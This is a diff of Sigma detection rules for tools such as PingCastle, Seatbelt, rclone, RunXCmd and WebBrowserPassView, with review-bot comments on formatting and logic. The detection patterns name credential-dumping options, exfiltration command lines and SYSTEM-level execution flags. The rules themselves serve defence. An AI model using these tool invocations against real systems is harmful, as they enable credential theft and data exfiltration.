- --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - Hashes|contains: + # PingCastle.exe + - MD5=f741f25ac909ee434e50812d436c73ff + - 
MD5=d40acbfc29ee24388262e3d8be16f622 + - MD5=01bb2c16fadb992fa66228cd02d45c60 + - MD5=9e1b18e62e42b5444fc55b51e640355b + - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 + - MD5=324579d717c9b9b8e71d0269d13f811f + - MD5=63257a1ddaf83cfa43fe24a3bc06c207 + - MD5=049e85963826b059c9bac273bb9c82ab + - MD5=ecb98b7b4d4427eb8221381154ff4cb2 + - MD5=faf87749ac790ec3a10dd069d10f9d63 + - MD5=f296dba5d21ad18e6990b1992aea8f83 + - MD5=93ba94355e794b6c6f98204cf39f7a11 + - MD5=a258ef593ac63155523a461ecc73bdba + - MD5=97000eb5d1653f1140ee3f47186463c4 + - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 + - MD5=32fe9f0d2630ac40ea29023920f20f49 + - MD5=a05930dde939cfd02677fc18bb2b7df5 + - MD5=124283924e86933ff9054a549d3a268b + - MD5=ceda6909b8573fdeb0351c6920225686 + - MD5=60ce120040f2cd311c810ae6f6bbc182 + - MD5=2f10cdc5b09100a260703a28eadd0ceb + - MD5=011d967028e797a4c16d547f7ba1463f + - MD5=2da9152c0970500c697c1c9b4a9e0360 + - MD5=b5ba72034b8f44d431f55275bace9f8b + - MD5=d6ed9101df0f24e27ff92ddab42dacca + - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d + - MD5=5e083cd0143ae95a6cb79b68c07ca573 + - MD5=28caff93748cb84be70486e79f04c2df + - MD5=9d4f12c30f9b500f896efd1800e4dd11 + - MD5=4586f7dd14271ad65a5fb696b393f4c0 + - MD5=86ba9dddbdf49215145b5bcd081d4011 + - MD5=9dce0a481343874ef9a36c9a825ef991 + - MD5=85890f62e231ad964b1fda7a674747ec + - MD5=599be548da6441d7fe3e9a1bb8cb0833 + - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 + - MD5=32d45718164205aec3e98e0223717d1d + - MD5=6ff5f373ee7f794cd17db50704d00ddb + - MD5=88efbdf41f0650f8f58a3053b0ca0459 + - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 + - MD5=781fa16511a595757154b4304d2dd350 + - MD5=5018ec39be0e296f4fc8c8575bfa8486 + - MD5=f4a84d6f1caf0875b50135423d04139f + - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b + - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 + - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d + - SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f + - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa + - SHA1=f14c9633040897d375e3069fddc71e859f283778 + - 
SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc + - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 + - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 + - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b + - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc + - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 + - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 + - SHA1=607e1fa810c799735221a609af3bfc405728c02d + - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 + - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a + - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 + - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 + - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 + - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 + - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea + - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 + - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 + - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad + - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 + - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 + - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 + - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a + - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db + - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 + - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 + - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 + - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c + - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d + - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 + - SHA1=c82152cddf9e5df49094686531872ecd545976db + - SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 + - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 + - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 + - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d + - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 + - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 + - SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b + - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 + - 
SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 + - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 + - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f + - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a + - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 + - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b + - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 + - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae + - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 + - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a + - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 + - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 + - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 + - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef + - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d + - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 + - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b + - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b + - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 + - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 + - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca + - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea + - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 + - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 + - SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 + - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 + - 
SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 + - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 + - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 + - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 + - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 + - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d + - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 + - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 + - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 + - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 + - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 + - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 + - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 + - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd + - Image|endswith: \PingCastle.exe + - OriginalFileName: PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' condition: process_creation and selection falsepositives: - Unknown +# Note: As this is a PUA the level may vary depending on your environment. Reduce or increase the level as you see fit level: medium ruletype: Sigma 
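Review bot: The `# PingCastle.exe` comment added at the head of the `Hashes|contains` list names the binary but not which releases the 42 MD5/SHA1/SHA256 triples belong to, whereas the other rules in this commit tag their hash lists with a version (`# v0.44.0`, `# v0.4`, `# v0.26.10`); without a range nobody can tell which release is missing when the list next needs updating. I'd replace it with something like `# PingCastle.exe release builds <FIRST_VERSION>-<LAST_VERSION>; update when a new release ships`, with the real range filled in. It is also worth stating in the same comment that `Image|endswith`, `OriginalFileName` and `Product` are alternatives in this OR-list, so the hashes only add coverage for builds whose file name and version metadata do not match. The `selection` list and the `detection` block start above this hunk.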
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml index 30b376ac7..170c39f27 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml @@ -1,14 +1,11 @@ title: PUA - PingCastle Execution From Potentially Suspicious Parent id: b37998de-a70b-4f33-b219-ec36bf433dc0 related: - - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c - type: derived + - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c + type: derived status: experimental -description: 'Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level via a script located in a potentially suspicious - or uncommon location. - - ' +description: | + Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ 
@@ -54,45 +51,44 @@ detection: - \AppData\Roaming\ - \Temporary Internet selection_parent_path_2: - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ selection_cli: - - Image|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' - condition: process_creation and (1 of selection_parent_* and selection_parent_ext - and selection_cli) + - Image|endswith: \PingCastle.exe + - OriginalFileName: PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' 
+ condition: process_creation and (1 of selection_parent_* and selection_parent_ext and selection_cli) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml index 6ae277a11..ba18de941 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml @@ -1,18 +1,13 @@ title: PUA - Process Hacker Execution id: 811e0002-b13b-4a15-9d00-a613fce66e42 related: - - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a - type: similar + - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a + type: similar status: experimental -description: 'Detects the execution of Process Hacker based on binary metadata information - (Image, Hash, Imphash, etc). - - Process Hacker is a tool to view and manipulate processes, kernel options and - other low level options. - +description: | + Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). + Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes. - - ' references: - https://processhacker.sourceforge.io/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ @@ -36,13 +31,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|contains: \ProcessHacker_ - - Image|endswith: \ProcessHacker.exe - - OriginalFileName: - - ProcessHacker.exe - - Process Hacker - - Description: Process Hacker - - Product: Process Hacker + - Image|contains: \ProcessHacker_ + - Image|endswith: \ProcessHacker.exe + - OriginalFileName: + - ProcessHacker.exe + - Process Hacker + - Description: Process Hacker + - Product: Process Hacker selection_hashes: Hashes|contains: - MD5=68F9B52895F4D34E74112F3129B3B00D 
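Review bot: The re-joined `condition` uses `1 of selection_parent_*`, and that wildcard also matches `selection_parent_ext` because the name shares the prefix, so the parent-path requirement is satisfied by the extension selection alone and the rule reduces to extension-and-command-line with the path check effectively dropped. Assuming the path selections follow the `selection_parent_path_2` naming visible in this hunk, narrowing the wildcard restores the intended logic: `condition: process_creation and (1 of selection_parent_path_* and selection_parent_ext and selection_cli)`. `selection_parent_ext` and the first path selection are defined above the hunk, so confirm their names before changing it.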
@@ -54,21 +49,20 @@ detection: - IMPHASH=3695333C60DEDECDCAFF1590409AA462 - IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF selection_hash_values: - - md5: - - 68f9b52895f4d34e74112f3129b3b00d - - b365af317ae730a67c936f21432b9c71 - - sha1: - - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e - - a0bdfac3ce1880b32ff9b696458327ce352e3b1d - - sha256: - - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f - - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 - - Imphash: - - 04de0ad9c37eb7bd52043d2ecac958df - - 3695333c60dedecdcaff1590409aa462 + - md5: + - 68f9b52895f4d34e74112f3129b3b00d + - b365af317ae730a67c936f21432b9c71 + - sha1: + - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e + - a0bdfac3ce1880b32ff9b696458327ce352e3b1d + - sha256: + - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f + - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 + - Imphash: + - 04de0ad9c37eb7bd52043d2ecac958df + - 3695333c60dedecdcaff1590409aa462 condition: process_creation and (1 of selection_*) falsepositives: - - While sometimes 'Process Hacker is used by legitimate administrators, the execution - of Process Hacker must be investigated and allowed on a case by case basis + - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml index 64687c416..90ce16682 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml 
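Review bot: The re-flowed `falsepositives` entry still carries a stray opening quote — `While sometimes 'Process Hacker is used by legitimate administrators` — which reads as a typo in the text analysts see; since the commit touches this line, drop it: `- While sometimes Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis`. A short comment above `selection_hash_values` would also help: the md5/sha1/sha256/Imphash entries pin only the two builds listed, and because the condition is `1 of selection_*`, version coverage beyond those two comes from `selection_image` (name/OriginalFileName/Description/Product) alone, e.g. `# hashes cover two known builds only; other versions are caught by selection_image`.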
@@ -1,8 +1,7 @@ title: PUA - Radmin Viewer Utility Execution id: 5817e76f-4804-41e6-8f1d-5fa0b3ecae2d status: test -description: Detects the execution of Radmin which can be abused by an adversary to - remotely control Windows machines +description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md - https://www.radmin.fr/ @@ -22,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: Radmin Viewer - - Product: Radmin Viewer - - OriginalFileName: Radmin.exe + - Description: Radmin Viewer + - Product: Radmin Viewer + - OriginalFileName: Radmin.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml index 812a06a70..2287cbaab 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml @@ -1,9 +1,7 @@ title: PUA - Potential PE Metadata Tamper Using Rcedit id: 0c92f2e6-f08f-4b73-9216-ecb0ca634689 status: test -description: Detects the use of rcedit to potentially alter executable PE metadata - properties, which could conceal efforts to rename system utilities for defense - evasion. +description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. references: - https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe - https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915 
@@ -26,15 +24,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \rcedit-x64.exe - - \rcedit-x86.exe - - Description: Edit resources of exe - - Product: rcedit + - Image|endswith: + - \rcedit-x64.exe + - \rcedit-x86.exe + - Description: Edit resources of exe + - Product: rcedit selection_flags: - CommandLine|contains: --set- + CommandLine|contains: --set- # Covers multiple edit commands such as "--set-resource-string" or "--set-version-string" selection_attributes: - CommandLine|contains: + CommandLine|contains: - OriginalFileName - CompanyName - FileDescription @@ -43,7 +41,6 @@ detection: - LegalCopyright condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of the tool by administrators or users to update metadata of - a binary + - Legitimate use of the tool by administrators or users to update metadata of a binary level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml index 223a39507..67fa11037 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml 
@@ -1,13 +1,12 @@ title: PUA - Rclone Execution id: e37db05d-d1f9-49c8-b464-cee1a4b11638 related: - - id: a0d63692-a531-4912-ad39-4393325b2a9c - type: obsoletes - - id: cb7286ba-f207-44ab-b9e6-760d82b84253 - type: obsoletes + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes status: test -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware @@ -29,15 +28,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_specific_options: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection_rclone_img: - - Image|endswith: \rclone.exe - - Description: Rsync for cloud storage + - Image|endswith: \rclone.exe + - Description: Rsync for cloud storage selection_rclone_cli: - CommandLine|contains: + CommandLine|contains: - pass - user - copy diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml index 61b36621b..7686dc6e2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml 
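Review bot: The joined description has a grammar slip, `as used by various ransomwares strains` — it should read `various ransomware strains`, and ideally name what the rule keys on so an analyst knows why it fired. Proposed: `Detects execution of the rclone utility (by image/description, or by the --config/--no-check-certificate/copy option combination) for exfiltration, as used by various ransomware strains like REvil, Conti, FiveHands, etc.`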
@@ -1,8 +1,7 @@ title: PUA - RunXCmd Execution id: 93199800-b52a-4dec-b762-75212c196542 status: test -description: Detects the use of the RunXCmd tool to execute commands with System or - TrustedInstaller accounts +description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts references: - https://www.d7xtech.com/free-software/runx/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_account: - CommandLine|contains: + CommandLine|contains: - ' /account=system ' - ' /account=ti ' selection_exec: - CommandLine|contains: /exec= + CommandLine|contains: /exec= condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml index 9e8d536e1..568c3ef68 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml @@ -1,8 +1,7 @@ title: PUA - Seatbelt Execution id: 38646daa-e78f-4ace-9de0-55547b2d30da status: test -description: Detects the execution of the PUA/Recon tool Seatbelt via PE information - of command line parameters +description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters references: - https://github.com/GhostPack/Seatbelt - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html 
@@ -23,24 +22,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Seatbelt.exe - - OriginalFileName: Seatbelt.exe - - Description: Seatbelt - - CommandLine|contains: - - ' DpapiMasterKeys' - - ' InterestingProcesses' - - ' InterestingFiles' - - ' CertificateThumbprints' - - ' ChromiumBookmarks' - - ' ChromiumHistory' - - ' ChromiumPresence' - - ' CloudCredentials' - - ' CredEnum' - - ' CredGuard' - - ' FirefoxHistory' - - ' ProcessCreationEvents' + - Image|endswith: \Seatbelt.exe + - OriginalFileName: Seatbelt.exe + - Description: Seatbelt + - CommandLine|contains: + # This just a list of the commands that will produce the least amount of FP in "theory" + # Comment out/in as needed in your environment + # To get the full list of commands see reference section + - ' DpapiMasterKeys' + - ' InterestingProcesses' + - ' InterestingFiles' + - ' CertificateThumbprints' + - ' ChromiumBookmarks' + - ' ChromiumHistory' + - ' ChromiumPresence' + - ' CloudCredentials' + - ' CredEnum' + - ' CredGuard' + - ' FirefoxHistory' + - ' ProcessCreationEvents' + # - ' RDPSessions' + # - ' PowerShellHistory' selection_group_list: - CommandLine|contains: + CommandLine|contains: - ' -group=misc' - ' -group=remote' - ' -group=chromium' @@ -49,7 +53,7 @@ detection: - ' -group=user' - ' -group=all' selection_group_output: - CommandLine|contains: ' -outputfile=' + CommandLine|contains: ' -outputfile=' condition: process_creation and (selection_img or all of selection_group_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml index d0ddb6491..21e2ba498 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml 
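Review bot: The new comment block has a grammar slip (`This just a list` → `This is just a list`) and omits the semantics it relies on: `selection_img` is a YAML list, so every entry is OR-ed and any single `CommandLine` token such as ` CredEnum` or ` InterestingFiles` fires on its own with no `Image`/`OriginalFileName` involvement. Suggested wording for the comment: `# selection_img is OR-ed: any one of the command names below triggers on its own, regardless of image name. This is just a list of the commands expected to produce the fewest FPs in theory; comment in/out per environment, see the references for the full command list`. The `selection_group_list` values continue outside this hunk.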
@@ -1,11 +1,10 @@ title: PUA - System Informer Execution id: 5722dff1-4bdd-4949-86ab-fbaf707e767a related: - - id: 811e0002-b13b-4a15-9d00-a613fce66e42 - type: similar + - id: 811e0002-b13b-4a15-9d00-a613fce66e42 + type: similar status: experimental -description: Detects the execution of System Informer, a task manager tool to view - and manipulate processes, kernel options and other low level operations +description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations references: - https://github.com/winsiderss/systeminformer author: Florian Roth (Nextron Systems) 
@@ -27,24 +26,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: \SystemInformer.exe - - OriginalFileName: SystemInformer.exe - - Description: System Informer - - Product: System Informer + - Image|endswith: \SystemInformer.exe + - OriginalFileName: SystemInformer.exe + - Description: System Informer + - Product: System Informer selection_hashes: Hashes|contains: + # Note: add other hashes as needed + # 3.0.11077.6550 - MD5=19426363A37C03C3ED6FEDF57B6696EC - SHA1=8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - SHA256=8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - IMPHASH=B68908ADAEB5D662F87F2528AF318F12 selection_hash_values: - - md5: 19426363A37C03C3ED6FEDF57B6696EC - - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - - Imphash: B68908ADAEB5D662F87F2528AF318F12 + - md5: 19426363A37C03C3ED6FEDF57B6696EC + - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC + - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 + - Imphash: B68908ADAEB5D662F87F2528AF318F12 condition: process_creation and (1 of selection_*) falsepositives: - - System Informer is regularly used legitimately by system administrators or developers. - Apply additional filters accordingly + - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml index 48fa22efe..7186c0043 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml 
@@ -1,10 +1,7 @@ title: PUA - WebBrowserPassView Execution id: d0dae994-26c6-4d2d-83b5-b3c8b79ae513 status: test -description: Detects the execution of WebBrowserPassView.exe. A password recovery - tool that reveals the passwords stored by the following Web browsers, Internet - Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, - Safari, and Opera +description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md author: frack113 @@ -22,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: Web Browser Password Viewer - - Image|endswith: \WebBrowserPassView.exe + - Description: Web Browser Password Viewer + - Image|endswith: \WebBrowserPassView.exe condition: 